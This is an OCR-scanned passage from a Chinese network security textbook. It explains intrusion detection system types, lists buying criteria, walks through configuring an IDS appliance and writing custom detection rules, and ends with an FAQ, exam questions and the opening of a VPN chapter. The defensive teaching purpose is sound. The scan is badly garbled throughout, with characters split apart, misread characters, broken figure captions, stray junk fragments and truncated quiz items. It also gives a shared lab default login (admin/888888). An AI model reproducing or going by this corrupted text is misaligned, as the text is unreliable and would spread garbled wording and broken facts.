击 , 能 够 检测 到 未 授权 的 非法 访问 。 它 不 需要 改变 服务 器 等 主机 配置 ,不 需要 安装 额外 软 
件 , 不 会 影响 系统 的 性 能 。NIDS 安装 方便 ,只 要 接 通 电源 ,做 一 些 简单 配置 ,再 连接 到 网 
络 上 即 可 。 部 署 NIDS 比 主机 入 侵 检测 系统 风险 小 很 多 ,发 生 故 障 不 会 影响 正常 业务 运 
行 。 其 缺点 是 NIDS 只 检查 与 它 直 连 的 网 段 的 通信 ,不 能 检测 不 同 网 段 的 数据 包 。NIDS 
通常 采用 特征 检测 法 ,只 能 检测 出 普通 攻击 ,很 难 实现 复杂 的 、 需 要 大 量 计 算 和 分 析 时 间 
的 攻击 检测 。 





3. 分 布 式 入 侵 检测 系统 


分 布 式 人 侵 检测 系统 (DIDS) 采 用 上 述 两 种 数据 来 源 ,能够 同时 分 析 来 自主 机 系统 审 
计 日 志和 网 络 数据 流 的 人 侵 检测 系统 。 一 般 为 分 布 式 结构 ,由 多 个 部 件 组 成 。 


但 24 入 侵 检测 系统 产品 介绍 


入 侵 检测 系统 产品 主要 分 为 硬件 和 软件 两 种 ,本 书 讨论 的 主要 是 硬件 产品 。 硬 件 产 
品 和 防火 墙 一 起 放置 在 机 架 上 ,而 不 是 安装 在 操作 系统 中 ,可 以 很 容易 地 把 入侵 检测 系统 
骨 入 网 络 中 。 硬 件 入 侵 检测 系统 主要 由 传感器 (Sensor) 和 控制 台 (Console) 两 部 分 组 成 。 
传感器 的 作用 是 采集 数据 ,包括 网 络 数据 包 、 系 统 日 志 等 ,分 析 数 据 并 生成 安全 事件 。 控 
制 台 的 作用 是 进行 中 央 管 理 , 通 常 具有 图 形 界面 ,便于 控制 和 管理 。IDS 设备 的 控制 端 被 
称 为 Console 端口 。IDS 的 初始 化 配置 是 通过 Console 端口 与 计算 机 的 串口 (RS-232) 相 
连 ,再 通过 Windows 系统 自 带 的 超级 终端 程序 进行 的 。 

入 侵 检测 系统 常用 的 检测 方法 有 特征 检测 .统计 检测 和 专家 系统 。 据 我 国 公安 部 计 
算 机 信息 安全 产品 质量 监督 检验 中 心 的 报告 ,国内 送 检 的 入 侵 检 测 产品 95% 是 属于 使 用 
入 侵 模板 进行 模式 匹配 的 特征 检测 产品 ,其 他 5% 是 采用 概率 统计 的 统计 检测 产品 与 基 
于 日 志 的 专家 知识 库 产品 。 市 面 上 入 侵 检测 产品 很 多 , 如何 判断 一 款 入 侵 检测 产品 是 否 
适合 自己 的 需要 ,通常 考虑 的 要 点 如 表 19-1 所 示 。 


表 19-1 入 侵 检 测 产品 选 购 要 点 


最 大 可 处 理 流量 ( 包 / 秒 ,P/s) 一 般 分 为 百 兆 位 、 千 兆 位 
能 否 有 效 检 测 分 片 .TTL 欺骗 .异常 TCP 分 段 、 慢 扫描 \ 协 同 攻 
击 等 
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续 表 

产品 的 伸缩 性 系统 支持 的 传感器 数目 、 最 大 数据 库 规模 、 传 感 器 与 控制 台 之 间 

通信 带宽 和 对 审计 日 志 溢出 的 处 理 
产品 支持 的 人 侵 特征 数 不 同 厂商 的 计算 方法 不 同 , 可 参照 国际 标准 
产品 的 响应 方法 从 本 地 、 远 程 等 多 角度 考察 ,是否 支持 防火 墙 联动 
特征 库 升 级 及 维护 费用 特征 库 需 要 不 断 更 新 才能 检测 出 新 出 现 的 攻击 方法 
是 否 通过 了 国家 权威 机 构 的 | 权威 测评 机 构 有 : 国家 信息 安全 测评 认证 中 心 、 公 安 部 计算 机 信 
评测 息 系统 安全 产品 质量 监督 检验 中 心 
是 否 有 成 功 案例 了 解 产品 的 成 功 应 用 案例 ,必要 时 可 进行 实地 考察 和 测试 使 用 
产品 的 价格 性 能 价格 比 和 保护 系统 的 价值 是 更 重要 的 因素 








市 面 上 入 侵 检 测 产品 很 多 ,一 些 大 型 厂商 如 IBM、 思 科 、TippingPoint、Juniper 的 产 
品 以 及 国内 的 厂商 如 启明 星 展 、 绿 盟 科 技 、 天 融 信 、H3C 的 产品 都 是 不 错 的 选择 ,最 终 选 
择 何 种 入 侵 检 测 产 品 还 需要 用 户 视 实 际 情况 而 定 。 


19.3 方案 设计 


方案 设计 如 表 19-2 所 示 。 
表 19-2 方案 设计 


任务 名 称 人 侵 检测 系统 的 部 署 与 配置 


1. IDS 的 部 署 与 配置 

(1) 连接 及 登录 

(2) IDS 系统 设置 

. IDS 人 侵 检 测 规则 配置 

. 能 连接 并 登录 入 侵 检测 系统 

. 能 查看 系统 信息 

.能 备份 系统 操作 

.能 诊断 系统 配置 

. 能 设置 人 侵 检测 系统 自 带 的 检测 规则 
。 能 使 用 人 侵 检测 系统 根据 规则 检测 人 侵 行 为 
. 掌握 常见 人 侵 检测 系统 的 功能 

. 了 解 人 侵 检测 的 工作 原理 

了 解 人 侵 检测 系统 的 分 类 
.了解 常见 人 侵 检 测 设备 

了 解 IDS 自 带 规则 库 中 的 各 种 攻击 类 型 
. 了 解 自 定义 规则 内 各 参数 含义 

熟悉 和 人 侵 检测 系统 与 防火 墙 的 区 别 

. 熟悉 人 侵 检 测 系统 与 系统 扫描 器 的 区 别 
. 掌握 人 侵 检 测 系统 部 署 的 位 置 
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. 培养 吃苦 耐劳 ,实事求是 ,一丝不苟 的 工作 态度 
. 树立 较 强 的 安全 意识 

. 培养 良好 的 职业 道德 

. 培养 分 析 能 力 和 应 变 能 力 

. 具有 可 持续 发 展 能 力 
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19.4 项 目 


将 
靶 


但 41 任务 1: 1IDS 的 部 署 与 配置 
1. 任务 目标 


了 解 IDS 设备 的 连接 和 简单 设置 ,掌握 IDS 关于 系统 配置 的 常用 功能 模块 ,包括 查 
看 系统 信息 、 备 份 系统 操作 和 诊断 系统 配置 等 。 


2. 工作 任务 


(1) 连接 及 登录 。 
(2) IDS 系统 设置 。 


3. 工作 环境 


(1) Windows 7 系统 的 主机 。 
(2) 一 台 入 侵 检测 系统 设备 。 


4. 实施 过 程 


(1) 连接 及 登录 。 

QO 使 用 单线 连接 : 第 1 组 蓝 盾 IDS 设备 的 第 一 端口 ,默认 IP 为 192. 168. 11. 4 ,在 IE 
输入 https://192. 168.11.4; 第 2 组 蓝 盾 IDS 第 一 端口 ,默认 IP 为 192. 168. 12. 4， 
输入 https://192. 168.12.4; 第 3 组 蓝 盾 IDS 第 一 端口 ,默认 IP 为 192. 168. 13. 4， 

输入 https://192. 168. 13. 4; 第 4 组 蓝 盾 IDS 第 一 端口 ,默认 IP 为 192. 168. 14. 4, 在 IE 
4 
4 


JE。 1 


输入 https://192. 168.14.4; 第 5 组 蓝 盾 IDS 第 一 端口 .默认 IP 为 192. 168. 15. 4， 
输入 https://192. 168.15.4; 第 6 组 蓝 盾 IDS 第 一 端口 ,默认 IP 为 192. 168. 16. 4， 
输入 https://192. 168. 16.4; 第 7 组 蓝 盾 IDS 第 一 端口 ,默认 IP 为 192. 168. 17. 4 ,在 IE 
输入 https://192. 168. 17.4; 第 8 组 蓝 盾 IDS 第 一 端口 ,默认 IP 为 192. 168. 18. 4 ,在 IE 
输入 https://192. 168. 18.4。 统 一 的 用 户 名 /密码 为 admin/888888。 

@ 配置 管理 端口 I P, 选 择 “ 网 络 配 置 " 一 “网 口 设置 "命令 ,配置 LAN2 端口 IP, 配 置 
如 图 19-1 所 示 。 
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图 19-1 网 口 设置 


@ 配置 镜像 端口 。 选 择 “ 网 络 设置 ">“ 镜 像 口 设置 "命令 ,为 LAN3 端口 选择 镜像 端 
口 , 如 图 19-2 所 示 。 





NIDS 网 络 入 侵 检测 系统 











图 19-2 镜像 端口 设置 


@ 设置 IDS 的 管理 界面 。 因 为 默认 只 有 第 一 端口 能 够 访问 , 须 做 策略 让 LAN2 端口 
能 够 访问 管理 系统 。 选 择 “ 系 统一 “管理 设置 ”命令 ,如 图 19-3 所 示 。 





中 国 矣 夺 。 “NIDS 网 络 入 侵 检测 系统 ess 











图 19-3 设置 IDS 的 管理 界面 


(2) IDS 系统 设置 。 
@ 选择 “系统 ”一 “系统 信息 ”设备 状态 ”命令 进入 设备 状态 页 面 ,该 页 面 显示 系统 
信息 、 网 络 接口 信息 及 系统 服务 等 ,如 图 19-4 所 示 。 































































































图 19-4 设备 状态 


各 选项 说 明 如 下 。 

系统 信息 : CPU 内存 、 硬 盘 使 用 实时 情况 。 

网 络 接口 信息 : 与 设备 相连 各 网 口 的 IP 地 址 ,数据 包 收发 比特 数 。 

系统 服务 : 各 项 服务 是 否 打开 , 恩 (绿色 ) 表 示 此 服务 已 经 打开 , 国 (灰色 ) 表 示 服 


务 未 打开 。 


@ 选择 “系统 ”>“ 系 统 维 护 ”>“ 配 置 备份 "命令 进入 备份 恢复 页 面 ,如 图 19-5 所 示 。 
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图 19-5 备份 恢复 


各 选项 说 明 如 下 。 

制作 : 将 系统 已 做 好 的 策略 保存 下 来 ,备份 成 配置 文件 。 

上 传 : 将 下 载 到 本 地 的 配置 文件 上 传 到 设备 ,才能 进行 故障 恢复 。 

下 载 : 将 配置 文件 下 载 到 本 地 机 器 上 ,防止 系统 出 现 意外 事故 ,是 一 种 防范 机 制 。 
恢复 : 可 以 将 下 载 到 本 地 的 配置 文件 在 设备 出 现 故障 时 再 上 传 到 设备 ,进行 恢复 。 
删除 : 删除 选 定 的 备份 文件 。 

@ 选择 “系统 ”>“ 系 统 维护 ”>“ 关 闭 系统 "命令 进入 关闭 设备 页 面 ,如 图 19-6 所 示 。 
各 选项 说 明 如 下 。 

立即 执行 : 立即 重启 和 关闭 设备 。 

之 后 执行 : 在 之 后 的 5 分 钟 至 1 小 时 之 间 的 某 个 特定 时 间 内 重启 和 关闭 设备 。 
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图 19-6 关闭 系统 


定时 执行 : 通过 设置 定时 时 间 ,能 在 当天 特定 的 时 间 重 启 和 关闭 设备 。 
@ 选择 “系统 ”一 “系统 工具 ”一 “配置 测试 "命令 进入 测试 结果 页 面 ,如 图 19-7 所 示 。 
该 页 面 显示 对 系统 配置 的 诊断 ,以 便 检查 配置 情况 。 
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图 19-7 查看 测试 结果 


@ 选择 “系统 ”一 “系统 工具 ”>“IP 工具 ”命令 进入 IP 工具 页 面 ,该 页 面 用 于 测试 一 
个 IP 地 址 或 者 主机 能 否 正常 通信 ,如 图 19-8 所 示 。 
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图 19-8 IP 工 具 


输入 IP 地 址 , 单 击 “ 执 行 ” 按 钮 ,出 现 的 结果 如 图 19-9 所 示 。 
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28. 254 ping statistics --— 
ansmi 5 received, O% pack: 
3.143/4.593/7.715/1.687 ms 


‘et loss, tiwe 4041ms 


19-9 JP 工具 的 运行 结果 
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@ 在 “工具 ”下 拉 列 表 框 中 选择 whois 查询 选项 ,然后 单 击 “ 执 行 ”按钮 ,出 现 的 结果 
如 图 19-10 所 示 。 


| 
工具 | whois 


db 六 | 四 


地 址 或 主机 名 [www google com 
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BN whoig 34 by 8i Tigeane Chtte://uhois. be. org/) 

Eopyr ?oht 1999Y 2003 Wl1iam 

Request; 66.249, 8: 
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图 19-10 ”WHOIS 查询 运行 结果 


但 42 任务 2: IDS 入 侵 检测 规则 配置 
1. 任务 目标 


了 解 IDS 自 带 检测 规则 库 中 的 各 种 攻击 类 型 ,初步 掌握 对 用 户 自 定义 规则 的 配置 。 
本 任务 主要 介绍 IDS 自 带 的 检测 规则 库 及 用 户 自 定义 规则 的 配置 。IDS 的 检测 规则 , 关 
联 规则 都 需 要 根据 网 络 的 实际 情况 来 进行 配置 , 当 出 现 入侵 时 ,所 有 的 入 侵 行为 数据 都 会 
在 IDS 服务 器 内 根据 规则 进行 检测 (捕获 、 拆 分 、 分 析 、 匹 配 )。 


2. 工作 任务 
系统 自 带 检测 规则 设置 。 
3. 工作 环境 


(1) Windows 7 系统 的 主机 。 
(2) 一 台 和 人 侵 检测 系统 设备 。 


4. 实施 过 程 


(1) 选择 “入侵 检 测 ” 一 “检测 规则 ”命令 ,该 页 面 显示 所 有 IDS 自 带 检测 规则 ,用 户 可 
以 查看 已 经 选中 的 规则 库 ,或 进行 规则 库 的 选择 。 系 统 会 定时 自动 下 载 更 新 规则 库 ,以 使 
用 户 得 到 及 时 的 保护 。 用 户 也 可 上 传 自 定义 补丁 更 新 规则 库 ,如 图 19-11 所 示 。 

建议 只 选中 必要 的 规则 ,以 提高 检测 的 速率 和 性 能 。 例 如 ,如 果 内 部 网 络 中 没有 数据 
库 服务 器 , 则 不 必 选 中 数据 库 规则 库 。 一 般 情况 下 ,选中 的 规则 越 多 ,对 进出 数据 包 的 检 
测 匹 配 耗 时 越 长 ,从 而 降低 了 IDS 设备 的 处 理性 能 。 

(2) 选择 入侵 检测 ”>“ 检 测 规则 ”一 “规则 设置 "命令 ,将 分 类 罗列 已 有 规则 及 其 危 
害 等 级 ,并 可 对 各 规则 进行 编辑 。 选 择 对 违反 该 规则 的 行为 警报 (Alert) ,通过 (Pass) 或 
者 记录 日 志 (Log) ,如 图 19-12 所 示 。 

(3) 选择 “入侵 检测 ”一 “检测 规则 一 * 自 定义 规则 ?命令 ,可 使 用 户 自行 定义 人 侵 检 
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图 19-11 “检测 规则 ”窗口 





图 19-12 “规则 设置 "窗口 


测 规则 ,如 图 19-13 一 图 19-19 所 示 。 

在 图 19-13 中 ,“ 报 警 信息 ” 指 的 是 触发 该 检测 事件 时 ,报警 的 内 容 。sid 指 的 是 事件 
的 编号 ,为 避免 与 系统 自 带 规则 库 的 事件 编号 冲突 ,使 用 1000001 开始 的 编号 。 入 侵 类 型 
指 的 是 对 入 侵 事件 的 归 类 ,选择 最 接近 的 归 类 。 协 议 指 的 是 对 入 侵 数 据 流 的 协议 定义 。 
基础 参数 为 对 该 事件 的 基础 数据 描述 ,如 报警 级 别 、 采 取 动 作 、 流 向 ( 单 向 (single) 、 双 向 
(double)) \ 源 地 址 \ 源 端口 .目标 地 址 、 目 标 端口 等 与 协议 无 关 的 基础 参数 。 

在 图 19-14 中 ,“ 内 容 关 键 字 ”用 于 对 入 侵 数 据 流 的 中 的 特征 码 进行 定义 ,以 更 准确 地 
判断 出 入 侵 行为 。offset 是 内 容 关 键 字 的 修饰 符 , 用 于 设 定 开始 搜索 的 位 置 。depth 是 内 
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图 19-14 “关键 字 ” 设 置 
容 关键 字 的 修饰 符 ,用 于 设 定 搜索 的 最 大 深度 。distance 是 指使 用 内 容 关 键 字 时 确信 模 
式 匹 配 间 至 少 有 N 个 字 节 存在 。within 是 指使 用 内 容 关 键 字 时 确保 模式 匹配 间 至 少 有 
NN 个 字 节 存在 。rawbytes 用 于 设置 是 否 允 许 规 则 查看 Telnet 解码 数据 来 处 理 不 常见 的 
数据 。 
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图 19-15 “IP 参数 ”设置 
在 图 19-15 中 , 如 果 在 “协议 ”下 拉 列 表 框 中 选择 了 ip, 则 可 以 设 定 更 具体 的 IP 参数。 


dsize: 检查 包 的 数据 部 分 大 小 。ttl: 检查 IP 头 的 TTL 的 值 。tos: 检查 IP 头 的 TOS 域 
的 值 。id: 检查 IP 头 的 分 片 ID 值 。ipopts: 检查 IP 头 的 OPTION 域 。fragbits: 检查 IP 
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图 19-16 “TCP 参数 "设置 








头 的 分 片 标志 位 。 

在 图 19-16 中 ,如 果 在 “协议 ”下拉 列表 框 中 选择 了 tcp, 可 以 设 定 更 具体 的 TCP 参 
数 。seq: 检查 TCP 顺序 号 的 值 。ack: 检查 TCP 应 答 (Acknowledgement) 的 值 。 
window: 检查 TCP Window 的 值 。flags: 检查 TCP Flags 的 值 。fin: 检查 TCP FIN 的 
值 。syn 检查 TCP SYN 的 值 。rst: 检查 TCP RST 的 值 。 
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图 19-17 “ICMP 参数 ”设置 


在 图 19-17 中 ,如果 在 “协议 ” 下 拉 列 表 框 中 选择 了 icmp, 可 以 设 定 更 具体 的 ICMP 参 
数 。id: 检查 ICMP ECHO ID 的 值 。seq: 检查 ICMP ECHO 顺序 号 的 值 。itype : 检查 
ICMP TYPE 的 值 。icode: 检查 ICMP CODE 的 值 。 

在 图 19-18 中 ,“ 阻 断 动作 ” 指 对 此 入 侵 事件 采取 阻 断 动 作 。“ 断 开 TCP” 中 的 reset 
dest 是 指向 发 送 方 发 送 TCP-RST 数据 包 ,reset source 是 指向 接收 方 发 送 TCP-RST 数 
据 包 ,reset both 是 指向 收发 双方 发 送 TCP-RST 数据 包 。“ 断 开 HTTP 中 ”的 block 是 指 
关闭 连接 并 且 发 送 一 个 通知 ,warm 是 指 发 送 明显 的 警告 信息 ,msg 是 指 把 msg 选项 的 内 
容 包 含 进 阻塞 通知 信息 中 。“ 断 开 ICMP” 中 的 icmp net 是 指向 发 送 方 发 送 ICMP_NET 
UNREACH ,icmp host 是 指向 发 送 方 发 送 ICMP HOST UNREACH ,icemp port 是 指向 
发 送 方 发 送 ICMP PORT UNREACH .icmp all 是 指向 发 送 方 发 送 上 述 所 有 的 ICMP 数 
据 包 。 
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图 19-19 ”启动 规则 


@ 统计 规则 指 的 是 对 一 段 时 间 内 重复 出 现 的 低级 别 事件 进行 统计 综合 报警 。 这 样 
可 以 减少 不 必要 的 报警 次 数 。 比 如 对 于 ICMP Windows PING 事件 ,如 果 需 要 在 60 秒 内 
重复 出 现 10 次 才 报 警 , 则 设置 如 图 19-20 所 示 。 


sid: (得 词 ) 
SrclP ~ 方式 : 
10 时 间 跨 度 秒 ): 





Notimes Windows PING in 60 seconds 





图 19-20 “统计 规则 ”配置 
其 中 ,gid 和 sid 可 以 通过 查询 得 到 。 


19.5 常见 问题 解答 


1. 入 侵 检测 系统 与 防火 墙 有 什么 不 同 ? 

答 : 如 果 把 防火 墙 比 作 一 栋 大 楼 的 门 锁 , 那 么 入 侵 检 测 系统 就 是 这 栋 大 楼 里 的 监视 
系统 。 一 旦 有 小 偷 怜 窗 进 入 大 楼 或 者 内 部 人 员 有 越界 行为 ,只 有 实时 监控 系统 才能 发 现 
情况 并 发 出 警报 。 通 过 在 网 络 中 安装 防火 墙 ,可 以 阻挡 一 般 性 的 网 络 攻击 行为 ,采用 入 侵 
检测 系统 则 可 以 对 越过 防火 墙 的 攻击 行为 以 及 来 自 网 络 内 部 的 违规 操作 进行 检测 和 响 
应 ,相当 于 为 网 络 提 供 第 二 道 保护 机 制 。 入 侵 检测 系统 多 安装 在 防火 墙 之 后 ,对 网 络 活动 











| C sy 网 络 安全 部品 (第 2 版] 


进行 实时 检测 ,在 多 数 情况 下 ,由 于 可 以 记录 和 禁止 网 络 活动 , 所 以 入 侵 检测 系统 是 防火 
墙 的 延续 ,可 以 和 防火 墙 以 及 路 由 器 配合 工作 。 

2. 入 侵 检 测 系统 与 系统 扫描 器 有 何不 同 ? 

答 : 系统 扫描 器 是 根据 攻击 特征 数据 库 来 扫描 系统 漏洞 , 它 更 关注 配置 上 的 漏洞 而 
不 是 实时 进出 主机 的 流量 。 在 遭受 攻击 的 主机 上 ,即使 正在 运行 扫描 程序 ,也 无 法 识别 这 
种 攻击 。 而 IDS 扫描 当前 网 络 的 活动 ,监视 和 记录 网 络 流量 ,根据 定义 好 的 规则 过 滤 从 
主机 网 卡 到 网 线 上 的 流量 ,提供 实时 报警 。 系 统 扫 描 器 只 检测 主机 上 先前 设置 的 漏洞 ,而 
IDS 监视 和 记录 网 络 流量 ,如 果 在 一 台 主机 上 和 运行 IDS 和 扫描 器 ,配置 合理 的 IDS 会 发 出 
很 多 警报 。 

3. 人 侵 检 测 系统 与 人 侵 防 御 系 统 (IPS) 有 何不 同 ? 

答 : 入侵 防御 系统 与 人 侵 检测 系统 有 些 类 似 , 但 是 IPS 一 般 是 立刻 采取 行动 阻止 威 
胁 , 例 如 及 时 阻止 某 个 IP 地 址 或 用 户 的 访问 ,而 不 仅仅 是 简单 地 发 出 警报 。IDS 是 被 动 
采取 行动 ,IPS 是 主动 响应 系统 。 

4. 人 侵 检测 系统 部 署 的 位 置 在 哪里 ? 

答 : 入侵 检测 系统 应 当 部 署 在 所 有 关注 流量 都 必须 流 经 的 链 路 上 。 关 注 的 流量 包括 
来 自 高 危 网 络 区 域 的 访问 流量 和 需要 进行 统计 、 监 视 的 网 络 报 文 。 因 此 IDS 在 交换 式 网 
络 中 的 位 置 一 般 选 择 为 尽 可 能 靠近 攻击 源 、 尽 可 能 靠近 受 保护 资源 。 通 常 连接 在 服务 器 
区 域 交换 机 上 ,或 者 在 重点 保护 网 段 局 域 网 交换 机 上 。 





19.6 认证 试题 


选择 题 

1. 以 下 关于 入 侵 检测 系统 的 描述 中 ,错误 的 是 (  )。 
A. 人 入侵 检测 是 一 种 主动 保护 网 络 免 受 攻击 的 安全 技术 
B. 入 侵 检 测 是 一 种 被 动 保护 网 络 免 受 攻击 的 安全 技术 
C， 入 侵 检 测 系统 能 够 对 网 络 活动 进行 监视 
D. 入 侵 检测 能 简化 管理 员 的 工作 ,保证 网 络 安全 运行 

2. 按照 检测 数据 的 来 源 可 将 入 侵 检测 系统 分 为 ( 
A. 基于 主机 的 IDS 和 基于 网 络 的 IDS 

.基于 主机 的 IDS 和 基于 域 控制 器 的 IDS 

.基于 服务 器 的 IDS 和 基于 域 控制 器 的 IDS 

.基于 浏览 器 的 IDS 和 基于 网 络 的 IDS 
) 不 是 将 入 侵 检测 系统 部 署 在 DMZ 中 的 优点 。 

.可 以 查 到 受 保护 区 域 主 机 被 攻击 的 状态 

.可 以 检测 防火 墙 系统 的 策略 配置 是 否 合理 

. 可 以 检测 DMZ 被 黑客 攻击 的 重点 

.可 以 审计 来 自 Internet 上 对 受到 保护 网 络 的 攻击 类 型 





日 中 内 一 日 中 员 
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4.( ”) 是 IDS 用 来 检测 对 系统 已 知 弱 点 进行 的 攻击 行为 。 
A. 签名 分 析 法 B. 统计 分 析 法 
C. 数据 完整 性 分 析 法 D. 数字 分 析 法 

5. 入 侵 检 测 系统 的 功能 有 (  ”)。 

A. 让 管理 员 了 解 网 络 系统 的 任何 变更 
B. 对 网 络 数据 包 进 行 检 测 和 过 滤 
C. 监控 和 识别 内 部 网 络 受到 的 攻击 
D. 对 网 络 安全 策略 的 指定 提供 指南 
6. 一 个 好 的 人 侵 检测 系统 具有 的 特点 有 ( 


A. 不 需要 人 工 干预 B. 不 占用 大 量 系统 资源 

C. 能 及 时 发 现 异 常 行为 D. 可 灵活 定制 用 户 需 求 
7. 基于 网 络 的 人 侵 检 测 系统 的 缺点 是 ( ” )。 

A. 对 加 密 通 信 无 能 为 力 B. 对 高 速 网 络 无 能 为 力 

C. 不 能 预测 命令 的 执行 后 果 D. 管理 和 实施 比较 复杂 


8. 人 侵 检测 系统 能 够 增强 网 络 的 安全 性 ,其 优点 体现 在 (  )。 
A. 使 现 有 的 安防 体系 更 完善 
B. 在 用 户 不 参与 的 情况 下 阻止 攻击 
C. 能 够 更 好 地 掌握 系统 情况 
D. 能 够 追踪 攻击 者 的 攻击 路 线 


9. 网 络 人 侵 检测 系统 是 企业 信息 安全 防护 的 重要 组 成 部 分 , 它 的 发 展 趋势 具 


) 


10. IDS 和 IPS 的 不 同 点 是 ( Ps 
A. IDS 能 发 现 网 络 和 人 侵 ,IPS 不 能 
B. IPS 可 以 直接 阻 断 网 络 攻 击 ,IDS 不 能 
C. IPS 和 IDS 的 安装 位 置 相同 
D. IPS 和 IDS 是 同一 种 产品 ,只 是 部 署 位 置 不 同 , 因 而 称呼 不 同 


A. 体系 化 B. 控制 化 C. 主观 化 D. 智能 化 


20.1 用 户 需求 与 分 析 


很 多 企业 采用 了 网 络 防火 墙 来 加 强 安全 性 ,但 是 防火 墙 不 容易 做 到 数据 的 加 密 、 用 户 
的 验证 等 。 有 些 系统 采用 软件 加 密 , 但 软件 加 密会 消耗 大 量 的 服务 器 资源 ,影响 系统 的 响 
应 速度 。 使 用 专线 把 不 同 地域 的 两 个 网 络 进行 互联 ,成 本 高 .通信 质量 好 ,但 成 本 较 高 。 
由 于 VPN 比 租用 专线 更 加 便宜 ,灵活 ,所 以 有 越 来 越 多 的 公司 采用 VPN ,连接 在 家 工作 
和 出 差 在 外 的 员工 ,以 及 代替 连接 分 公司 和 合作 伙伴 的 标准 广域网 。VPN 建 在 互联 网 的 
公共 网 络 架构 上 ,通过 隧道 协议 ,在 发 送 端 加 密 数据 ,在 接收 端 解 密 数据 ,以 保证 数据 的 私 


20.2 预备 知识 


21 VAN 的 功能 


VPN(Virtual Private Network ,虚拟 专用 网 ) 可 以 实现 不 同 网 络 的 组 件 与 资源 之 间 

的 相互 连接 。 虚 拟 专用 网 能 够 利用 Internet 或 其 他 公共 互联 网 络 的 基础 设施 为 用 户 创建 
隧道 ,并 提供 与 专用 网 络 一 样 的 安全 和 功能 保障 。VPN 允许 出 差 人 员 或 企业 分 支 机 构 使 
用 Internet 等 公共 互联 网 络 的 路 由 基础 设施 以 安全 的 方式 与 位 于 企业 局 域 网 内 的 企业 服 
务 器 建立 连接 。VPN 对 用 户 端 透明 ,用户 就 像 使 用 一 条 专用 线路 在 客户 计算 机 和 企业 服 
务 器 之 间 建 立 点 对 点 连接 。 目 前 VPN 技术 主要 采用 隧道 技术 (Tunneling) .加 /解密 技术 
(Encryption/Decryption) , 密 钥 管理 技术 (Key Management) 用 户 与 设备 身份 验证 技术 
(Authentication) 来 保证 内 部 数据 通过 Internet 的 安全 传输 。 

VPN 的 技术 优势 包括 以 下 几 方 面 内 容 。 

(1) 安全 性 。VPN 利用 隧道 技术 对 原 有 协议 进行 重新 封装 ,并 提供 加 密 、 数 据 验证 、 
户 验证 等 一 系列 安全 防护 措施 .保证 数据 在 通过 不 安全 的 公共 网 络 时 能 够 安全 传输 。 

(2) 经 济 性 。 与 专线 技术 相 比 ,VPN 技术 降低 了 费用 ,在 原 有 网 络 连 接 的 条 件 下 提 
供 了 比 专线 技术 更 安全 的 数据 保护 机 制 。 
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(3) 扩展 性 。 与 专线 技术 相 比 ,VPN 技术 通过 在 用 户 端 进行 配置 就 可 以 灵活 的 扩 
展 ,不 需要 新 的 申请 或 投入 。 


22 WPN 的 分 类 
1. VPN 的 应 用 模式 分 类 


(1) 远程 接 入 VPN 应 用 模式 。 远 程 接 入 VPN 实现 出 差 员工 或 家 庭 办 公 应 用 等 移动 


用 户 安全 访问 企业 网 络 的 应 用 。 

(2) Intranet VPN 应 用 模式 。Intranet VPN 用 于 组 建 跨 地 区 的 企业 总 部 与 分 支 机 
构 内 部 网 络 的 安全 互联 。 

(3) Extranet VPN 应 用 模式 。Extranet VPN 用 于 企业 与 客户 、 合 作 伙伴 之 间 建 立 
网 络 安全 的 互联 。 


2. VPN 网 络 结构 的 分 类 


(1) VPN 的 远程 访问 结构 。 用 于 提供 远程 移动 用 户 对 企业 内 部 网 络 资源 的 安全 访 
问 , 即 Access VPN。 单 机 通过 公共 网 络 利用 隧道 技术 连接 到 企业 的 一 个 网 络 内 部 ,成 为 
网 络 中 的 一 个 节点 ,这 种 结构 又 称 为 点 到 站 点 .桌面 到 网 络 结构 。 

(2) VPN 的 网 络 互 联结 构 。 用 于 企业 总 部 网 络 和 分 支 机 构 网 络 的 内 部 网 络 之 间 的 
安全 互联 , 即 Intranet VPN 或 Extranet VPN ,保证 网 络 互联 时 在 公共 网 络 传输 过 程 中 的 
数据 安全 ,同时 也 可 以 防止 非法 访问 内 部 网 络 资源 。 这 是 一 种 网 络 到 网 络 ( 站 点 到 站 点 ) 
结构 。 

(3) VPN 的 点 对 点 通信 结构 。 用 于 企业 内 部 网 的 两 台 主机 之 间 的 安全 通信 , 即 单机 
到 单机 结构 。 


3. VPN 所 采用 的 隧道 协议 特点 分 类 





从 VPN 采 用 的 隧道 协议 所 处 的 网 络 层 次 来 看 ,PPTP、L2P 和 L2TP 等 VPN 协议 工 
作 在 TCP/IP 协议 族 的 第 二 层 ( 数 据 链 路 层 )。IPSec、GRE 等 协议 工作 在 TCP/IP 协议 
族 的 第 三 层 ( 网 络 层 )。SSL/TLS VPN 协议 工作 在 TCP/IP 协议 族 的 第 四 层 ( 传 输 层 )。 
MPLS 协议 跨越 第 二 层 和 第 三 层 。L2TP IPSec 是 第 二 层 和 第 三 层 配合 的 隧道 协议 。 


4. VPN 接 入 方式 分 类 


一 般 的 企业 都 有 自己 的 内 部 局 域 网 ,多 是 通过 光纤 连接 到 互联 网 ,而 单个 出 差 用 户 或 
家 庭 用 户 多 是 通过 拨号 (如 ADSL) 连 接 到 互联 网 ,这 种 方式 建立 的 VPN , 称 为 拨号 接 人 
VPN, 也 称 为 VPDN。 在 路 由 器 上 用 vpdn enable 命令 启用 VPDN 功能 。 


X23 VFN 典型 协议 
1. SSL VPN 


SSL VPN 是 一 种 新 兴 的 应 用 层 VPN 技术 ,SSL 协议 定义 了 完整 的 安全 机 制 , 对 用 
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户 数 据 的 完整 性 和 私密 性 都 有 完善 的 保护 。 常 见 SSL VPN 网 关 提 供 了 四 种 SSL VPN 
接 入 方式 以 适应 不 同 用 户 需求 ,包括 Web 转发 方式 .端口 转发 方式 .文件 共享 方式 和 全 网 
接 入 方式 ,其 接 入 功能 分 别 由 不 同 的 功能 模块 完成 。 同 时 还 具备 强大 的 访问 控制 ,权限 管 
理 、 细 粒度 审计 和 日 志 记录 等 功能 。 





2. GRE VPN 


GRE 支持 将 一 种 协议 的 报 文 封装 到 另 一 种 协议 报 文中 ,可 以 解决 异种 网 络 的 传输 问 
题 。GRE 隧道 扩展 了 受 跳 数 限制 的 路 由 协议 的 工作 范围 ,支持 企业 灵活 设计 网 络 拓扑 。 
但 GRE 协议 没有 安全 功能 ,因此 需要 首先 通过 GRE 对 报 文 进行 封装 ,然后 再 由 IPSec 对 
封装 后 的 报 文 进 行 加 密 和 传输 。GRE 在 封装 数据 时 ,会 添加 GRE 头 部 信息 ,还 会 添加 新 
的 传输 协议 头 部 信息 。GRE 的 配置 命令 如 下 。 

[R1] interface tunnel 0/0/1 // 创 建 虚拟 端口 

[R1 - Tunnel0/0/1]ip address 192.168.1.1 24 

